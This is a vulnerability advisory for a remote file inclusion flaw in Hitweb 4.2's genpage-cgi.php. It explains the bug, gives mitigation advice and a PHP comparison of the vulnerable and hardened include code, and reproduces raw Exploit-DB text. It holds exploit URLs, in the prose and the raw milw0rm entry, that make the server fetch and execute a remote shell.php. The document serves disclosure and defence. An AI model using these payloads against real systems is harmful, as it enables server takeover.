Vendor: Hitweb
By: ToxiC
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: Hitweb
Affected Version From: 4.2
Affected Version To: 4.2
Patch Exists: NO
Related CWE: N/A
CPE: a:hitweb:hitweb:4.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

Hitweb 4.2 Remote Include File

The vulnerability exists in the genpage-cgi.php script of Hitweb 4.2. The script executes include "$REP_INC/lib_database.php" without ever assigning $REP_INC, so when PHP's register_globals setting is enabled the variable is populated directly from the REP_INC request parameter. An attacker who supplies a URL in that parameter (for example REP_INC=http://attacker.example/shell.php?) makes the application fetch and execute the remote file; the trailing "?" turns the appended "/lib_database.php" into a query string on the attacker's URL, so the attacker's script is loaded unchanged. Remote inclusion additionally requires allow_url_fopen to be on (and, on PHP 5.2 and later, allow_url_include). Where those are off, the same uninitialised variable still allows inclusion of arbitrary local files, including any file the attacker can plant on the server.

Mitigation:

Assign $REP_INC to a fixed server-side path in the script or its configuration before the include, and never build an include path from request data; if part of the path must be user-selectable, check it against an allow-list and confirm the resolved file lies under the intended directory. As defense in depth, set register_globals=Off and allow_url_include=Off (and allow_url_fopen=Off where remote fopen is not needed) in php.ini.
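The include pattern behind this advisory next to a hardened rewrite, as an added PHP example; it is not Hitweb's code and not part of the original advisory. The include directory, the allow-listed library names, the function names and the use of an array to stand in for register_globals are all assumptions.

```php
<?php
// Added example, not code from Hitweb or the advisory: the uninitialised
// include pattern described above, beside a hardened rewrite. The include
// directory, library names and function names are assumptions.

// --- Vulnerable shape (genpage-cgi.php per the advisory) ---
// $REP_INC is never assigned by the script. With register_globals=On the
// request parameter REP_INC becomes the variable, and with allow_url_fopen
// (plus allow_url_include on PHP >= 5.2) enabled, include fetches and runs
// whatever URL it points at. $request stands in for register_globals here.
function vulnerable_include_path(array $request): string
{
    $REP_INC = isset($request['REP_INC']) ? $request['REP_INC'] : '';
    return "$REP_INC/lib_database.php";   // include "$REP_INC/lib_database.php";
}

// --- Hardened shape ---
// 1. The include directory is fixed by the script, never by the request.
// 2. A caller-chosen library name must match an allow-list.
// 3. The resolved path must sit under the include directory; realpath()
//    returns false for missing files and for stream wrappers (http://,
//    php://) and collapses "../", so traversal and remote URLs are rejected.
define('HITWEB_INC_DIR', __DIR__ . '/inc');            // assumed location

function safe_include_path(string $name): string
{
    $allowed = ['lib_database', 'lib_page'];           // assumed library list
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException("library not allowed: $name");
    }
    $base = realpath(HITWEB_INC_DIR);
    $path = realpath(HITWEB_INC_DIR . '/' . $name . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("include outside base directory: $name");
    }
    return $path;
}

// Demonstration with the advisory's payload (hostname taken from the advisory).
$payload = ['REP_INC' => 'http://www.evalsite.com/shell.php?'];
echo vulnerable_include_path($payload), "\n";
// -> http://www.evalsite.com/shell.php?/lib_database.php
//    The appended "/lib_database.php" is now just a query string that the
//    attacker's web server ignores, so shell.php is served and executed.

$names = ['lib_database', '../../../etc/passwd', 'http://www.evalsite.com/shell.php?'];
foreach ($names as $name) {
    try {
        // Passes only for lib_database, and only if inc/lib_database.php exists.
        echo safe_include_path($name), "\n";
    } catch (Exception $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

Run it with the PHP CLI from a directory containing an inc/lib_database.php. The $request array simulates register_globals because that setting was removed in PHP 5.4; on the PHP 4/5.1 builds current in 2006 the first function is simply what an unassigned $REP_INC behaved like. In the hardened version the allow-list is the primary control and the realpath() prefix check is the backstop: either one alone rejects the three inputs shown, and keeping both means a later change to the list cannot quietly reopen traversal.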

Exploit-DB raw data:

Hitweb 4.2 Remote Include File

CreW: ToxiC

Bug Found By Drago84

Source Code:
http://freshmeat.net/redir/hitweb/15633/url_tgz/hitweb-4.2_php.tgz

Problem is:
include "$REP_INC/lib_database.php";

Page:
genpage-cgi.php

Path:
Declare $REP_INC

Expl:
http://www.site.com/dir_hitweb/genpage-cgi.php?REP_INC=http://www.evalsite.com/shell.php?

Greatz:Str0ke

# milw0rm.com [2006-08-08]